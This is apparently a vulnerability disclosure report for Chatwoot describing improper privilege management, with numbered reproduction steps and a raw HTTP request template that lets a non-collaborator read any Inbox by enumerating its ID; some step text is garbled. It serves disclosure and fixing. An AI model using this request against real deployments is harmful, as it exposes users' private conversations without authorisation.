Improper Privilege Management in chatwoot/chatwoot
Sep 6th 2021
A user without collaborator access to an Inbox is able to reveal the messages from it, by guessing the ID of the Inbox.
🕵️♂️ Proof of Concept
1; With an Administrator user, create an Inbox (email type)
2; Only add the Administrator itself to the list of collaborators in the Inbox
3; Create two different account (
Buser, none of them are Administrators)
3; Send a message to the previously created
Auser with the Administrator
4; Log in with user
B, and obtain the following values from the cookie and headers:
whole cookie value
5; With the Administrator, reveal the ID of the Inbox, by getting it from the URL, when the Inbox is opened. This is an incremental value, so the malicious user can easily enumerate it.
6; Use the request attached below, and replace the values mentioned above in the request, and also insert the
GET /api/v1/accounts/2/conversations?inbox_id=<INSERT_INBOX_ID_HERE>&status=open&assignee_type=all&page=1 Host: <INSERT_HOSTNAME_HERE>:3000 Accept: application/json, text/plain, */* expiry: 1636142330 token-type: Bearer User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Referer: http://<INSER_HOSTNAME_HERE>:3000/app/accounts/2/inbox/1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 If-None-Match: W/"8ed557c413e99925a3a4c825069d35f9" Connection: close Cookie: <INSERT_COOKIE_HERE> uid: <INSERT_UID_HERE> access-token: <INSERT_ACCESS_TOKEN_HERE> client: <INSERT_CLIENT_HERE> Content-Length: 2
Upon sending the crafted request, the whole details of the Inbox are shown for the non-collaborator user.
All the Inboxes are exposed for any user, even if they are not a collaborator of the Inbox itself.